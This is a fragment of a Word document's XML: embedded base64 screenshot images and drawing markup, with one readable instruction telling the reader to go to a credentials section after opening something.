E7Xy9lhqUXl/wCr8vw7efu/&#10;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8LnDUUAQAAJYPAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJv&#10;RG9jLnhtbFBLAQItAAoAAAAAAAAAIQAPg4V1/x4BAP8eAQAUAAAAAAAAAAAAAAAAALkGAABkcnMv&#10;bWVkaWEvaW1hZ2UxLmpwZ1BLAQItABQABgAIAAAAIQB/HCbi3QAAAAUBAAAPAAAAAAAAAAAAAAAA&#10;AOolAQBkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAA&#10;AAAAAAD0JgEAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAADlJwEAAAA=&#10;">
                <v:rect id="Rectangle 3084" o:spid="_x0000_s1237" style="position:absolute;left:59448;top:32362;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32537EC2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3085" o:spid="_x0000_s1238" style="position:absolute;top:34008;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583B09C6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3086" o:spid="_x0000_s1239" style="position:absolute;top:36035;width:3483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5EDD9C45" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>After opening go to credentials section</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3087" o:spid="_x0000_s1240" style="position:absolute;left:26216;top:36035;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14:paraId="5F80069B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3097" o:spid="_x0000_s1241" type="#_x0000_t75" style="position:absolute;left:383;top:127;width:58737;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CZxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/dasJA&#10;FITvC77DcoTe1Y0taIzZiBYKgtCqFcG7Q/bkB7Nn0+yq6du7QqGXw8x8w6SL3jTiSp2rLSsYjyIQ&#10;xLnVNZcKDt8fLzEI55E1NpZJwS85WGSDpxQTbW+8o+velyJA2CWooPK+TaR0eUUG3ci2xMErbGfQ&#10;B9mVUnd4C3DTyNcomkiDNYeFClt6ryg/7y9GQfG5GU+Psd2tvi6FXp+2sXQ/TqnnYb+cg/DU+//w&#10;X3utFbxFsyk83oQnILM7AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANWmUJnHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId74" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3098" o:spid="_x0000_s1242" style="position:absolute;left:256;width:58991;height:33261;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5899150,332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FVwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LagIx&#10;FN0X/Idwhe5qYpWio1FEKFhaEB8Ll5fJncng5GaYxHHs15tFocvDeS/XvatFR22oPGsYjxQI4tyb&#10;iksN59Pn2wxEiMgGa8+k4UEB1qvByxIz4+98oO4YS5FCOGSowcbYZFKG3JLDMPINceIK3zqMCbal&#10;NC3eU7ir5btSH9JhxanBYkNbS/n1eHMafqfxZzOZP2Z7s1W2+7p03/ui0Pp12G8WICL18V/8594Z&#10;DRM1T3PTm/QE5OoJAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA0vBxVcMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,3326130r5899150,l5899150,,,,,3326130xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3326130"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4DEF18" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA6F25" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E6A8FF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EE0E35" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A403B5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2F2BA4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:left="40" w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18681B1B" wp14:editId="6CE49E64">
                <wp:extent cx="5960974" cy="3385588"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="40790" name="Group 40790"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5960974" cy="3385588"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5960974" cy="3385588"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="3164" name="Rectangle 3164"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3236388"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="51094493"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185" name="Picture 3185"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId75"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3186" name="Shape 3186"/>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681B1B" id="Group 40790" o:spid="_x0000_s1243" style="width:469.35pt;height:266.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59609,33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lGnS3QMAAB4KAAAOAAAAZHJzL2Uyb0RvYy54bWy8Vm1v3DYM/j6g&#10;/8Hw98b2Ob74jNwVRdMGBYY1aLsfoJPlszFZEiTdW3/9SMov1yRdhgxYgPgoiaQePiIp3b479TI6&#10;COs6rdZxdpXGkVBc153areM/v396W8aR80zVTGol1vFZuPjd5s1vt0dTiYVutayFjcCJctXRrOPW&#10;e1MlieOt6Jm70kYoWGy07ZmHod0ltWVH8N7LZJGmy+SobW2s5sI5mL0Li/GG/DeN4P5L0zjhI7mO&#10;AZunr6XvFr/J5pZVO8tM2/EBBnsFip51CjadXN0xz6K97Z646jtutdONv+K6T3TTdFxQDBBNlj6K&#10;5t7qvaFYdtVxZyaagNpHPL3aLf/jcG/NN/NggYmj2QEXNMJYTo3t8RdQRiei7DxRJk4+4jBZrJbp&#10;6uY6jjis5XlZFGUZSOUtMP/EjrcfX7BMxo2Tn+AcDSSImzlw/42Dby0zgqh1FXDwYKOuhgCyJYSi&#10;WA+Z+hVyh6mdFBHNEj2kO5HlKge8PcNUscpWi2wZR8jJIl/mIycTa0WRQ2EgZ9mqvM6XSNkUOKuM&#10;df5e6D5CYR1bgELZxQ6/Ox9URxXcXir8Kv2pkzKs4gzwNyJEyZ+2JwoyS3PcDue2uj5D6K22P75A&#10;ETdSH9exHqQY6xp2x9U4kp8VUI4lNAp2FLajYL38oKnQAp73e6+bjgDPuw3A4Cw3t6bjFfwPiQ3S&#10;k0N9uQGAld9bEQ9O+n/lo2f2r715CzVomO+2nez8mfoJ0Iyg1OGh43i2OLjMj7IY8wMUcF/IDpgD&#10;PkdNtMNDwPFPbrayM3hCyA3KA2BoRo+K+ZmYQ6O403zfC+VD57NCAnatXNsZF0e2Ev1WQBLbz3WG&#10;gFjlvBWetyg2sDFmNCK7WCCUMzDE/IuczhY3KZw+ZixJtMGUz+VNflPAcugCab5KiZPXpjTBCkBI&#10;BFwhYf+HDlBC3YYOQD0Cz5fKEzMYMuHl6g8sDVfLzNBqlc0MLVb5E4b4PhQ9HtdY6HCh1KHkYa4d&#10;JX5So4it4R/vNshvtEOnKEZQ4EU5YGmxZQcouN5D5X/XpOnnxj1qhMyZdaS61J180jVwGd6oN/4a&#10;8n2pT1RBqowa42/QvKDzQodL7USAhGFRVk+hgt4lmVJh1IviGhOYM3hlNFA51FDhglV1cPNMy3T+&#10;LAXyIdVX0UDzhAsvIztnd9sP0kYHhu2O/rDkCCCook2ouMEq/aUVqjJpWjb4GtwMG5DLwRNqCnrS&#10;TGAGt3xAE9418DqAOMfXDUCajAiWVn6yV/Amow0xuYdo506NAeGIWjXdxvAIIUTDgwlfOZdj0p+f&#10;dZu/AQAA//8DAFBLAwQKAAAAAAAAACEAZGoivVBPAQBQTwEAFAAAAGRycy9tZWRpYS9pbWFnZTEu&#10;anBn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoM&#10;DAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAIeA8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&#10;D/CqH2zUtLkk